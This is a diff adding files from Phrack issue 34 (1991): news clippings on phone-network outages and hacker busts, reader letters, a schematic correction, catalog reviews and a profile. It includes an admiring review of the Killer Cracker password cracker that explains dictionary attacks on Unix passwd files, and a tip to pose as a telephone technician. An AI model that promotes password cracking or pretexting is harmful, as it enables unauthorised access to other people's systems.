+Linnen blamed an internal power failure in a long-distance switching office
+in Manhattan.  Hours after the 4:50 PM EDT failure, 40 planes loaded with
+passengers were sitting on the runway at Kennedy, 35 at Newark, 30 at La
+Guardia.  "During the height of the thing, at least 300 aircraft were delayed
+at metropolitan airports," said Bob Fulton, a spokesperson for the Federal
+Aviation Administration.  Included: flights taking off "from California to
+Florida" and headed for New York, said FAA's Fred Farrar.  Farrar said planes
+had to be grounded for safety.  Without telephone communication, they would
+"fly willy-nilly."  Among diverted flights: a British Airways supersonic
+Concorde from London, which landed at Bradley airport outside Hartford, Conn.
+Passenger reaction:  at Washington's National Airport, Dominique Becoeur of
+Paris was "reading, drinking, and thinking" while waiting for a flight to New
+York.  At La Guardia, Ernie Baugh, of Chattanooga, Tenn., said, "I think I
+will go and have another beer."  Flights were reported resuming by 9 p.m.
+EDT.  Linnen said AT&T was busy Tuesday night restoring long-distance service
+in and out of New York City, which had been interrupted.  Some international
+service also had been affected.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+AT&T's Hang Ups                                                October 19, 1991
+~~~~~~~~~~~~~~
+By John Schneidawind (USA Today - "The Big Hang-Up Phone Crash Grounds
+   Airplanes, Raises Anger")
+
+     The Federal Administration Aviation has some good news for travelers who
+were stranded at airports, or delayed for hours, the past two days by the New
+York City telephone outage.  If a similar phone disaster strikes next month,
+hardly any fliers will know the difference.  That's because AT&T is close to
+completing installation of a network of microwave dishes that will
+supplement, if not replace, the phone lines AT&T uses to relay calls between
+air-traffic controllers in different cities.  Tuesday evening, flights in and
+out of some of the nation's busiest airports - Kennedy, La Guardia, and
+Newark, N.J. - were grounded because FAA controllers couldn't communicate
+with one another.  For much of the 1980's, land-based fiber optic lines have
+been slowly replacing microwave phone dishes phone companies long have used
+to transmit telephone calls.  That's because fiber-optic wires were thought
+to provide clearer calls than microwave technology.  Now, it's becoming
+apparent that sending some or most telephone calls via wireless microwave
+might ease the burden handled by fiber-optic cables.  In addition, a
+microwave call could be transmitted point-to-point, bypassing an inoperative
+switching center when a breakdown or catastrophe occurs.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Computer Maker Says Tiny Software Flaw Caused Phone Disruptions
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Edmund L Andrews (New York Times)
+
+     WASHINGTON -- A manufacturer of telephone call-routing computers
+said that a defect in three or four lines of computer code, rather than a
+hacker or a computer "virus," appeared to be the culprit behind a mysterious
+spate of breakdowns that disrupted local telephone service for 10 million
+customers around the country in late June and early this month.
+
+     In congressional testimony Tuesday, an official of the manufacturer, DSC
+Communications of Plano, Texas, said all the problems had been traced to recent
+upgrades in its software, which had not been thoroughly tested for hidden
+"bugs."
+     Although the telephone companies that experienced failures were using
+slightly different versions of the software, the company said, each version was
+infected with the flaw.  "Our equipment was without question a major
+contributor to the disruptions," Frank Perpiglia, DSC's vice president for
+technology and product development, told the House telecommunications
+subcommittee.  "We must be forthright in accepting responsibility for
+failure."
+
+       Officials at both DSC and the regional Bell companies said they could
+not entirely rule out the possibility of sabotage, but said the evidence points
+strongly to unintentional errors. The flaws caused the computers to send a
+flood of erroneous messages when the computer encountered routine maintenance
+problems.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+TELEPHONE TECHNOLOGY QUESTIONED AFTER FAILURES
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Edmund L. Andrew (New York Times)
+
+     WASHINGTON -- Striking similarities between nearly simultaneous
+computer malfunctions that disrupted local telephone service on the East Coast
+and in Los Angeles on Wednesday have raised questions among communications
+experts about the reliability of advanced networks that all the Bell telephone
+companies are now installing.
+
+     The problems experienced by both Pacific Bell and the Chesapeake and
+Potomac Co., which serves Washington, Maryland, Virginia and parts of West
+Virginia, involved computer programs on advanced call-routing equipment, which
+uses the same new technology, one being adopted throughout the communications
+industry.
+
+     The problems, which were corrected in both areas by early evening on
+Wednesday, made it impossible for about nine million telephone customers to
+complete local telephone calls.
+
+     Although the origins of both malfunctions remained unclear on Thursday,
+the difficulties at the two companies bore a strong resemblance to a brief but
+massive breakdown experienced by the American Telephone and Telegraph Co.'s
+long-distance lines in January 1990.
+
+     In all three cases, a problem at one switching center quickly corrupted
+other switches and paralyzed much of the system. Perhaps the biggest fear,
+federal regulators say, is that as telephone companies link their networks more
+closely, malfunctions at one company can infect systems at other companies and
+at long-distance carriers.
+
+     "What you want to avoid is the situation where one system contaminates
+another," said an investigator at the Federal Communications Commission who
+insisted on anonymity.
+
+     "I guess the ultimate concern is that software or hardware would be
+deployed in a way that the corruption could be processed through entire
+network, and there would be no alternatives available."
+     As the telephone companies and government regulators tried to determine
+more precisely on Thursday what went wrong, investigators at the communications
+commission said they would also look at several other questions:
+
+     Are there system wide problems that have gone unnoticed until now?  Can
+telephone companies reduce risks by reducing their dependence on one type of
+switching equipment?  Were the disruptions caused by computer operators outside
+the telephone companies trying to sabotage the systems?
+
+     Officials at both companies discounted the possibility that a computer
+hacker might have caused the failures, and outside experts tended to agree.
+
+     "There's always that possibility, but most likely it was some kind of
+glitch or bug in the software," said A. Michael Noll, a professor at the
+Annenberg School of Communications at the University of Southern California and
+author of several textbooks on telecommunications technology.
+
+     Several independent communications experts said the problems reflected
+the difficulty of spotting all the hidden problems in complex software before
+putting it into commercial use.
+
+     "It's very hard to simulate all the possibilities in a laboratory," said
+Richard Jay Solomon, a telecommunications consultant and research associate at
+the Massachusetts Institute of Technology.  "You have to go out in the field
+and keep your fingers crossed."
+
+     As more information became available on Thursday, the two disruptions
+appeared to be almost identical. The problem at Chesapeake & Potomac, a
+subsidiary of the Bell Atlantic Corp., began as the company was increasing the
+traffic being routed by one of its four signal processing computers. For
+reasons that remain a mystery, the system began to malfunction about 11:40 a.m.
+
+     The computer was supposed to shut itself down, allowing the traffic to
+be handled by other computers. Instead, it sent out a barrage of erroneous
+signals, apparently overwhelming the other two computers.  "It was as if bogus
+information was being sent," said Edward Stanley, a company spokesman.
+
+     The same thing seems to have occurred almost two hours later, at about 11
+a.m., in Los Angeles, said Paul Hirsch, a spokesman for Pacific Bell, a
+subsidiary of the Pacific Telesis Group.
+
+     Hirsch said the problem began when one of four signal transfer points
+signaled to the others that it was having problems. The other three computers
+froze after being overloaded by signals the defective computer.
+
+     Hirsch said his company continued to believe that the two telephone
+incidents were completely unrelated.  "Someone wins the lottery every week,"
+he said.  "Stranger things can happen."
+
+     Officials at Chesapeake and Potomac said the problems were probably
+unrelated.  Asked if hackers could have caused the problems, Ellen Fitzgerald,
+a spokeswoman for Chesapeake and Potomac, said she had been assured that
+the system could not be penetrated.  But, she added, "a few days ago I would
+have told you that what happened yesterday wouldn't happen."
+     Terry Adams, a spokesman at the DSC Communications Corp., which made
+both systems, said company officials also discounted any connection between the
+failures.
+______________________________________________________________________________
diff --git a/phrack34/11.txt b/phrack34/11.txt
new file mode 100644
index 0000000..bf2eb51
--- /dev/null
+++ b/phrack34/11.txt
@@ -0,0 +1,313 @@
+                               ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-four, File #11 of 11
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN             Phrack World News               PWN
+              PWN                                             PWN
+              PWN           Issue XXXIV,  Part Two            PWN
+              PWN                                             PWN
+              PWN            Compiled by Dispater             PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Mind Rape or Media Rape?
+~~~~~~~~~~~~~~~~~~~~~~~
+Special Thanks: Night Ranger
+
+Thursday September 26, 1991  was no ordinary day for Mind Rape, a young Arizona
+State college student.  When he finally made it home that day, he found his home
+had been raided by the feds.  'They took EVERYTHING! Including my Metallica
+tape!' he told me.  After talking to him for quite a while I learned a lot, not
+just about his bust but about hacking in general.  He instructed me not to say
+anything specifically on the advice of his lawyer and the EFF, but he did want
+me to let the real reason he was busted be known - His electronic newsletter
+entitled NSA (for National Security Anarchists).  Mind Rape has some very
+important views on hacking that the government doesn't want others to hear.
+Some of these views were contained in his newest and soon to be released
+newsletter NSA issue number five, which was confiscated of course.  He was also
+working on a book about hacker's philosophy, which was taken too.  He has not
+yet been charged but in the eyes of the media he is already been tried and
+found guilty.  It is unfortunate the general public gets its information from
+news reports like the following because, as you can see, they can be quite
+misleading.  Hopefully once Mind Rape gets everything straight he will continue
+to write his book, after all it is his constitutional right to do so, and I
+think it be quite informative to both the hackers of the nineties and the
+outside world.
+
+The following is a transcript of a news report covering his story...
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+     Male Announcer: That student is Donald _____ of Phoenix.  Officials of
+LDL Long Distance believe he's one of around 20 hackers who've been ripping off
+their company for fun and profit.  In tonight's Night Team Report we'll see how
+this kind of thievery adds up.  The nation's telephone companies loose more
+than a billion dollars a year to hackers.  Mark Nighten (sp?) a security
+director for LDL Long Distance.  Last month he was poring through records like
+these which convinced him to believe that someone was making hundreds of
+computer generated phone calls to his company's 1-800 access line trying to get
+customer's calling card codes.  He went to the Phoenix Police.  They got a
+search warrant and traced the calls to a house near 18th Drive near Union
+Hills.  Police went there last month and came away with a computer, software
+and a list of phone codes, all belonging to 19 year old Donald _____ an ASU
+student.   With nighten suspects _____ is just one of 20 hacker on his network
+who can make thousands of dollars worth of calls which would wind up on other
+people's phone bills.
+
+     Mark: You can see the magnitude of this.  Off of one authorization code
+you could have 10, maybe 150 other people...
+
+     Male Announcer: Lemme ask ya...How bad are you getting ripped off here?
+
+     Mark: We've had to have somebody on this 24 hours a day.  We've been
+getting killed.
+
+     Male Announcer: Hackers often sell the codes they steal to other students.
+So that hundreds of students and Arizona State University and University of
+Arizona also could be ripping of the company.  Students at Arizona State
+University told me today that they have not herd of LDL's troubles, but they
+confirmed that stolen phone codes do have a way of getting around.
+
+     I iz a College Student: Someone hears...ya know...about the interest and
+someone else knows somebody...ya know...and they tell you and you talk to
+them and...ya know...it's not overly expensive or anything like that.
+
+     Male Announcer: Dr. Dan Kneer of Arizona State University's School
+of Business is a nationally recognized expert on computer crime.  [who?]  He
+contends that hacking is mushrooming.
+
+     Dr. Dan: The problem that I see is that these people philosophically
+don't see this as a crime.  For most of them this is an intellectual challenge.
+
+     Male Announcer: That challenge led Dutch students to break into a United
+States Army Computer during operation desert storm.  And as this Japanese
+documentary shows, it led hackers in a New York City to use payphones to commit
+big time rip-offs.  Now it's important to point out that Donald ______, that
+Arizona State University student, has not yet been charged with any crime and
+if he is charged he is innocent until proven guilty.
+
+     Female announcer: What is the penalty for hacking?
+
+     Male Announcer: Just for getting into a system when you're not supposed to
+can be up to a year and a half in prison.   But if there is criminal intent to
+steal, to rip-off that system, the penalty can be as high as 10 years in jail
+and a $150,000.00 fine.
+
+_______________________________________________________________________________
+
+Computer Hacker Gets Probation                              September 26, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Special Thanks: Flaming Carrot (Pittsburgh Post-Gazette)
+
+     A Mt. Lebanon woman who was able to make thousands of free long-distance
+telephone calls by breaking into voice mail boxes with a touch tone telephone
+has been placed on 10 years probation.  Last Friday, Common Pleas Judge Robert
+E. Dauer ordered Andrea Gerulis, 20, of Castle Shannon Boulevard to make
+restitution of $4,300 to Magee Womens Hospital and $2,516 to Pittsburgh
+Cellular Telephone Co.
+
+     Gerulis, a Mt. Lebanon High School graduate, was a computer hacker who
+entered telephone computer systems illegally so that she could make telephone
+calls without paying for the service.  Mt. Lebanon police Detective John L.
+Michalec posed as a computer hacker and spent nine months investigating her
+activities, which were done by dialing codes on a touch-tone telephone.
+
+     After a non-jury trial in May, Dauer convicted her of two counts of theft
+of services and two counts of unlawful use of computers.  Assistant District
+Attorney Thaddeus A. Dutkowski recommended probation because he didn't want
+Gerulis to go to jail, where she could teach inmates how to commit crimes with
+a telephone.  If she were incarcerated, she would have the largest classroom
+environment she could hope for, Dutkowski said.
+
+     Dauer agreed that inmates already know too much about committing crimes
+with telephones.  Gerulis told Dauer that she was sorry for what she did, that
+when she started, she was doing it for fun.  She was also ordered to continue
+psychological counseling.
+_______________________________________________________________________________
+
+More Archaic Government Regulations Proposed
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Special Thanks: Stainless Steal Provider (New York Times)
+
+     The federal government said Thursday that it would introduce a standard
+for authenticating electronic data later this summer, but the announcement
+prompted an angry reaction from one of the leading private providers of software
+that protects computer data.
+
+     The company, RSA Data Security Inc. of Redwood City, Calif., said the
+government had failed to address fears about the possibility of a secret "trap
+door," which would permit intelligence and law-enforcement agencies to look at
+private data.
+
+    The issue of providing special mechanisms to permit government access to
+private information has caused a growing public debate recently.
+
+    Earlier this year an anti-terrorism bill introduced in Congress called on
+the computer and telecommunication industries to permit federal agencies to
+look at private data.  But the statement was later dropped from the bill after
+extensive public opposition.
+
+    Government officials said that it would be possible for technical experts
+to examine the standard when it is released this summer and they could decide
+for themselves whether there were any shortcomings in the design of the
+standard.
+
+    "It will be openly published and people can inspect it to their heart's
+content," said James H. Burrows, head of the computer systems laboratory at the
+National Institute of Standards and Technology.
+
+    He added that the new standard was not intended to encrypt computer data,
+and that the government would continue to rely on an earlier technology known
+as the Data Encryption Standard to actually hide information from potential
+electronic eavesdroppers.
+
+    Burrows said there was a project under way to develop a successor to that
+standard, but that it was years away from completion.
+______________________________________________________________________________
+
+Computer Whiz Accused Of Illegal Access and Mischief        September 25, 1991
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Peter G. Chronis (The Denver Post Page 1 "NASA vs. Hobbyist")
+
+     An Aurora computer hobbyist who allegedly used a personal computer and his
+home phone to penetrate NASA computers hacked off Uncle Sam enough to be
+indicted on seven federal counts yesterday.  Richard G. Wittman, 24, the
+alleged "hacker," was accused of two felonies, including gaining unauthorized
+access to NASA computers to alter, damage, or destroy information, and five
+misdemeanor counts of interfering with the government's operation of the
+computers.  Wittman allegedly got into the NASA system on March 7, June 11,
+June 19, June 28, July 25, July 30, and Aug. 2, 1.
+
+     Bob Pence, FBI chief in Denver, said Wittman used a personal computer in
+his home and gained access to the NASA systems over telephone lines. The
+investigation, which took more than a year, concluded that Wittman accessed the
+NASA computer system and agency computers at the Marshall Space flight Center in
+Huntsville, Alabama, and the Goddard Space Flight Center in Greenbelt,
+Maryland.
+
+     The NASA computers are linked to a system called Telenet, which allows
+qualified people to access government data bases.  A user name and password
+are required to reach the NASA computers.  Federal sources declined to reveal
+more information because the complex case involves "sensitive material."
+
+     Wittman, a high-school graduate, apparently hadn't worked in the computer
+industry and held a series of odd jobs.  The felony counts against him each
+carry a possible five-year prison term and $250,000 fine.
+_______________________________________________________________________________
+
+Security Increases
+~~~~~~~~~~~~~~~~~
+Special Thanks: Stainless Steal Provider (New York Times)
+
+     The foundation was started by Richard Stallman, who was awarded a MacArthur
+Foundation fellowship in 1.  While mainstream software companies
+have prohibited users from freely copying their programs, Stallman, who is
+widely respected for developing computer languages and software editing tools,
+has argued that information is not the same as other commodities and should be
+shared without cost.
+
+     His password has been widely known among network users because he has
+refused to keep it secret.  He is bitter about the changes that have
+accompanied the coming of age of computer networks.
+
+     Last month, after security was increased at the foundation and many users
+were stripped of their guest privileges, Stallman said he considered giving up
+his quest.
+
+    In the end, he decided that the cause of creating free software was too
+important to abandon, but he said he feels like a pariah.  "Since I won't agree
+to have a real password, I will only be able to log in on the 'inside'
+ machines,"
+he wrote in an electronic message in response to a reporter's query.
+
+    "I still feel partly ashamed of participating in this. I've been forced to
+choose between two principles, both of which are so important to me that I
+won't accept the loss of either of them."
+
+     Idealists like Stallman and Ted Nelson, the author of the cult classic
+ "Computer Lib," hoped that the computer revolution wouldn't be like the
+industrial revolution. This time the wealth -- information -- would be free to
+everyone and instant communication would break down the barriers between rich
+and poor and remake mankind.
+
+     Marvin Minsky, a computer science professor at MIT, said that for 15
+years, beginning in 1963, researchers at the school lived in a paradise,
+sharing computers and networks before a system of password protection was
+installed. Now that has changed.  "It's sad," he said.
+
+    "But Richard Stallman is living in a dream world.  He has this view that
+his idea of computer ethics will prevail.  But it's not going to happen this
+year or next."
+
+    Instead of finding community on computer networks, many users are now
+confronted with virus invasions and information theft, leading to the same
+sense of alienation and fear felt by residents of large cities.
+
+   "At first I thought this was Marshall McLuhan's global village coming to
+reality," said Neil Harris, a manager at General Electric Information Services
+Co., which sets up computer conferences and sells information to about 200,000
+members around the world.
+
+   "But it's not that at all. It's a lot of people connecting in hundreds of
+small communities based around highly specific interests."
+
+    Steven Levy, who has written about the early days of computing at MIT, said
+that the demise of the Free Software Foundation's open door policy was
+inevitable.
+
+   "When you pass the plate around in church you don't expect people to steal
+from it," he said.  "But sooner or later everyone knows that the plate is
+unguarded, and there are always people who don't care about the church.  The
+question is how far do you go to protect it?  Do you lock the church or do you
+send an armed guard around with the plate?"
+______________________________________________________________________________
+
+PWN Quicknotes
+~~~~~~~~~~~~~
+1.   On June 12, 1991, Sirhackalot's equipment was confiscated by the Southern
+     Bell and the FBI without any charges being filed.  Neither the FBI nor
+     Southern Bell bothered to explain why they were in his home and taking his
+     personal possessions.  Again neither party could tell Sirhackalot what he
+     supposedly did to bring both agency's to his doorstep.  Also busted were
+     Mr.Doo and The Imortal Phreak.  [Special Thanks: The Marauder (404)]
+_______________________________________________________________________________
+
+2.   Bill Cook is no longer an assistant United States Attorney in Chicago.  It
+     is unknown how he left his position.  Basic questions go unanswered. Did
+     he quit or was fired?  If he was fired, we'd like to know exactly why.
+_______________________________________________________________________________
+
+3.   Wanted:  Targets of Operation Sun Devil
+
+     Computer Professionals for Social Responsibility (CPSR) is pursuing a
+     lawsuit against the Secret Service seeking the release of information
+     concerning Operation Sun Devil.  In recently filed court papers, the
+     agency claims that the information cannot be disclosed because, among
+     other reasons, disclosure would violate the privacy of those individuals
+     who are the targets of the investigation.  This argument can be overcome
+     if CPSR obtains signed releases from those individuals.  CPSR is
+     requesting the cooperation of anyone who was the subject of a Sun Devil
+     raid on or about May 7, 1.  We are prepared to enter into an attorney-
+     client relationship with individuals responding to this request, so that
+     confidentiality will be assured.
+
+     Please respond ASAP to:
+
+                           David Sobel
+                           CPSR Legal Counsel
+                           (202) 544-9240
+                           dsobel@washofc.cpsr.org
+_______________________________________________________________________________
+
+4.   Recently Microsoft discovered it was the victim of trespassing.  A
+     security guard noticed two people playing volleyball on the premises and
+     knew that they did not work for Microsoft.  The officer approached the
+     volleyball players and asked them to leave.  The trespassers left.  Later
+     someone asked the security guard how he knew that the people playing
+     volleyball were not Microsoft employees. He replied, "They had tans."
+     [Special Thanks: Psychotic Surfer]
+_______________________________________________________________________________
+
+
diff --git a/phrack34/2.txt b/phrack34/2.txt
new file mode 100644
index 0000000..10ee3a2
--- /dev/null
+++ b/phrack34/2.txt
@@ -0,0 +1,241 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-four, File #2 of 11
+
+                         ^[-=:< Phrack Loopback >:=-]^
+
+                             By:  The Phrack Staff
+
+     Phrack Loopback is a forum for you, the reader, to ask questions, air
+problems, and talk about what ever topic you would like to discuss.  This is
+also the place The Phrack Staff will make suggestions to you by reviewing
+various items of note; magazines, software, catalogs, hardware, etc.
+_______________________________________________________________________________
+
+What's on Your Mind
+~~~~~~~~~~~~~~~~~~
+
+>Date: Fri, 20 Sep 91 01:22:30 -0400
+>To: phracksub@stormking.com
+>
+>So what exactly DID happen to Agent Steal?  There was a small blurb in
+>PWN for 33, but gave no details.  Why was he arrested, what was confiscated,
+>and how long will he probably be away for.
+>
+>Mind you, this is a tragic loss, since Agent Steal was a gifted hacker and
+>had a whole lotta balls to boot.
+>
+>                               Sincerely,
+>
+>                                   A concerned reader
+
+     To be honest, it would not in his best interest to say much about his
+case before his trial.  What we have written comes from a very reliable source.
+Some people close to him are denying everything.  This is most likely to keep
+from happening to him what happened to people like Mind Rape, who have basically
+been "convicted" by the media.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+>From: Drahgon
+>Date: Thu Sep 26 06:00:35 1991
+>
+>    Dear Dispater,
+>
+>        My name is Drahgon unless, of course.  I have several things to blow
+>    from my mind here....
+>
+>        How is the progress of Phrack  33?  I am not really up on all the
+>    hoopla surrounding  it, but  I am  curious.  In  high school  I  often
+>    published "underground newsletters" about the manufacture of drugs and
+>    explosives, etc.   The computer underground is a  new territory for me
+>    and I have just begun.  I would love to hear about your mag....I would
+>    perhaps have something to offer.
+
+     We at Phrack Inc. are here to publish any kind of information you the
+reader are interested in.  We, unlike many other people out there, will not
+judge you and can call you a "lamer" if you submit something to us that we
+might think is a little elementary.  We might not necessarily run it in Phrack,
+but we aren't the kind of people that are going to call you up in the middle
+of the night on an Alliance Teleconference and harass you.  In fact, there are
+many text files out there that are out-dated and need to be corrected!
+Simply put, if you are interested in it, there are probably two hundred others
+out that are afraid to ask, because some El1Te person will call them
+"stupid."  Here at Phrack Inc., WE ARE NOT El1Te, WE ARE JUST COOL AS HELL!
+We want to help everyone in their quest for knowledge.
+
+>        Secondly,  I want to start  my own bbs up  here in my town.  This
+>    town  is dead,  but there  is still a  glint of  life, it  needs to be
+>    kindled.  There are currently  no BBS's up here that carry information
+>    of  an "alternative nature",  and there  is in fact  laws that prevent
+>    them from springing up.  (whatever happened to freedom of the press?),
+>    Well,  anyway, I  would like to  know if you  would support  a BBS of
+>    mine, and maybe you could give me some pointers...
+>
+>    Thanx ALOT
+>         DRAHGON
+
+     That's great!  We're always glad to see new faces that are truly interested
+in helping people by becoming a source of information.  If you
+have any questions about BBS's you should ask the expert, Crimson Death.  He
+will be more than happy to help you out.
+_______________________________________________________________________________
+
+Corrections
+~~~~~~~~~~
+     In V.3, I#33, File 9 of 13, there was a error.  R5 Should have been a
+10K pot and not just a resistor.  The corrected part of the schematic
+should look like this:
+       _
++9__S1/  _____________________________________________________________
+        |        |           |          |                   |   S3    |
+       R1       R2           |         R3                o  @  o      |
+        |___C1___|      _____|          |_________|/___ /   o   \___  |
+        |    ____|_____|_____|____      |     |   |\   |    |      _| |
+     _| o   |    6     4    14    |    R4     |__ D1   |    |   R9<   |
+ S2   | o  _|5                  13|_____|       _|     |    |__  |    |
+        | | |                     |     |__  R5<       |      _| |    |
+        g |_|10       IC1        8|_      _|  |        |   R8<   |    |
+            |         556         | |__R6<    g        |__  |    |    |
+           _|9                  12|_|                    _| |    |    |
+          | |                     | |__C2__g          R7<   |    |    |
+          | |_11___3___7___2___1__|                    |    |    |    |
+_______________________________________________________________________________
+
+Hardware Catalog Review
+~~~~~~~~~~~~~~~~~~~~~~
+by Twisted Pair
+
+You can never get enough catalogs.  One reason is because you never know what
+off-the-wall parts you'll be needing.  From time to time I'll be reviewing
+catalogs so you'll be able to learn where to get the really good stuff as far
+as computer equipment, telco test equipment, and IC chips are concerned.  In
+this issue, we study two of them...
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+SYNTRONICS
+2143 Guaranty Drive
+Nashville, Tennessee  37214
+(615) 885-5200
+
+I recently saw an issue of "Nuts and Volts" magazine which had a Syntronics ad
+in it.  I sent the dollar they wanted for a catalog.  Apparently, demand for
+the catalogs was so  great that they're having some more printed up.  They sent
+my dollar back with an explanation and a partial photocopy of the catalog.
+An associate on the left coast and I want to build a tone decoder and have been
+looking for a particular chip for a long time.  We found it in this catalog.
+It's an SSI-202 Tone Decoder IC for $12.  Not bad for a chip I was unable to
+locate in about 30 catalogs I've searched through.  A fellow phreak was told by
+a zit-faced Radio Shack employee over their 800 number, "They had only 3 left
+and they would cost $100 each." I don't think so.
+
+Syntronics is selling plans for an interesting device you hook up to the phone
+line.  With it you can call it and  turn on any one of three 110VAC outlets.
+To turn them  on you use simple DTMF commands.  This would be useful for
+turning on your computer, modem, room bug, security lights, etc from a remote
+location.  Plans for this device  cost $9 and you'd need the above-mentioned IC
+chip to build it with.
+
+Syntronics carries:
+-------------------
+ Project Plans    Software    Unusual Hardware    Kits    IC's    Transistors
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Telephone International         (The marketplace for
+PO BOX 3589                     communications equipment,
+Crossville, Tennessee  38557    services, and employment)
+(615) 484-3685
+
+This is a monthly publication you can receive free. It's usually about 30 pages
+printed on large yellow-pages paper.  To save yourself the $50 a year
+first-class yearly subscription rate, just tell them you're a telephone
+technician.  Tell them you need to often buy PBX's, Terminal Blocks, etc.
+They'll send it to you free, because you're special!
+
+Here's a sampling of stuff you can find in there:
+-------------------------------------------------
+A Complete Digital Switching System with 3200 lines on a flatbed trailer !!!!!!
+Repaired Payphones                                Optical Fiber xmission system
+Operator's Headsets                                     CO Digital multiplexers
+AT&T teletypes                                                Used FAX machines
+AT&T Chevy bucket trucks                                           Hookswitches
+
+Digital error message announcers     Central Office Coin System Processor Cards
+
+Telephone International lists a bunch of telco seminars happening around the
+country on their "Calendar of Events" page.  They also list conferences for
+security organizations including dates and phone numbers you'd need to register.
+
+That's it for this edition of Hardware Hacking.  Keep an eye out for good
+suppliers to the Phreak world.  Pass'em along to Phrack.
+
+                               -T_W-I_S-T_E-D_
+                                  -P_A-I_R-
+_______________________________________________________________________________
+
+A Review of the Killer Cracker V.7.0
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by The Legion of d0oDez
+
+As every hacker worth his/her salt knows, the Unix operating system has major
+security problems when it comes to it's passwd file.  Although this may be
+good as some people think information should not be hoarded, others think
+information should be kept to be people who can use it best, the one's with
+the most money.  The passwd file is the Unix file that stores the user
+information which included username, home directory, and passwords among
+others.  I will not go into the basics of Unix as this is not a Unix
+how-to hack file.  It is a review of Killer Cracker 7.0 (aka KC7.)
+
+KC7 is a Unix password hacker that is portable to most machines.  It is
+written by Doctor Dissector and is free software as the terms of the GNU
+General Public License (By the Free Software Foundation <address at end of
+file>) states.  The version 7.0 is not the latest version but seems to be
+the best to use.  It is dated as 6/1/91 which makes it pretty recent.  8.0
+is rumored to be out but we have not had the opportunity to review it yet as
+we are still testing it. ;-)
+
+The best thing about KC7 is that you can run it on most machines that will
+run C programs which happens to include MS-DOS machines.  With this in
+mind, you can now let your PC do the work of hacking passwords in the privacy
+of your own home without having to use a mainframe which might be a bit
+risky.  The distribution copy of KC7 comes with the following files:
+
+      KC.EXE -- MS-DOS executable
+      KC.DOC -- Documents
+  Source.DOC -- The source code to KC
+        KC.C -- The Turbo C source code
+
+  And other files that pertain to DES and word files.
+
+KC7 works by taking an ascii file composed of words and encrypting them so
+that it can compare the encrypted words with the passwords in the PASSWD file.
+It is pretty efficient but if running on an MS-DOS system, you will probably
+want to use a machine that is at least a 286-12 or higher.  The time to
+complete a PASSWD file is directly proportional to how large the file is
+(max size of PASSWD must be less than 64K on an MS-DOS machine) and what
+speed of machine you are using.  There are options which allow you to take
+words (aka guesses) from other sources as well as a words file.  These
+sources can be words from the PASSWD file such as the username, single
+characters, and straight ascii characters such as DEL or ^D.  It can also
+manipulate the guesses in various ways which might be helpful in guessing
+passwords.
+
+Another useful option is the RESTORE function.  KC7 has the ability to
+allow the user to abort a crack session and then resume cracking at a
+later date.  This is very nice since one does not always have the time
+nor patience to crack a 50k passwd file without wanting to use his/her
+machine for other uses such as trying out new passwords.
+
+We have found that the best way, as suggested by the author, to crack is by
+using the default method which is to crack by word and not by username.
+You will understand when you get a hold of the software.
+
+You can get KC7 at most H/P oriented bbs's as everyone thinks he/she is
+a Unix wizard nowadays.
+
+Overall, KC7 is an excellent program and we suggest it to all Unix hackers.
+We also hope you have enjoyed this file and we look forward to bringing
+more interesting reading to your terminal.  Until then.... Happy hacking.
+_____________________________________________________________________________
diff --git a/phrack34/3.txt b/phrack34/3.txt
new file mode 100644
index 0000000..311affb
--- /dev/null
+++ b/phrack34/3.txt
@@ -0,0 +1,361 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Four, File #3 of 11
+
+                -*[  P H R A C K  XXXIV  P R O P H I L E  ]*-
+
+                        -=>[ Presented by Dispater ]<=-
+
+                                The Disk Jockey
+                                ~~~~~~~~~~~~~~~
+              Handle: The Disk Jockey (over 10 years now...)
+            Call him: Doug
+           Reach him: douglas@netcom.com
+        Past handles: None
+       Handle origin: Selected it way back in the Apple days, when
+                      it was hip to have a hardware-related name.
+       Date of Birth: 12/29/67
+ Age at current date: 23
+Approximate Location: Silicon Valley
+              Height: 6'1"
+              Weight: 220 lbs.
+           Eye color: Green
+          Hair Color: Blond/brown
+           Education: Cornell, Univ of Michigan, Stanford, and a
+                      slew of others schools that I had the
+                      opportunity to attend.  What started out as
+                      a strong belief in law became so jaded that
+                      I fell back on Comp Sci.  Still wake up in
+                      the middle of the night yelling "NO!, NO!"
+                      Also have a wallpaper degree in Psychology.
+           Computers: First: Apple //.  Presently: several.  Mac
+                      IIfx, 386/33, and several others that I can't
+                      seem to get rid of...
+
+-------------------------------------------------------------------------------
+
+The Story of my Hacking Career
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+     I was lucky enough to be able to get my hands on computers early, back in
+the days of the PET and the TRS-80.  Although we poke fun at a Trash-80 now, at
+the time I was completely fascinated by it.  Remember Newdos/80, LDOS, and
+utilities like SuperZap?
+
+     Things started really rolling after a friend introduced me to the Apple.
+Although I never fell into the stereotype of being a computer "nerd" (don't we
+all like to think that?), compared to the redundancy of normal schoolwork,
+learning about the Apple was a new and unexplored world.  Unlike most of the
+other computer "types", I didn't read science fiction, didn't have any social
+problems, and thought looking at girls was more enjoyable than talking about
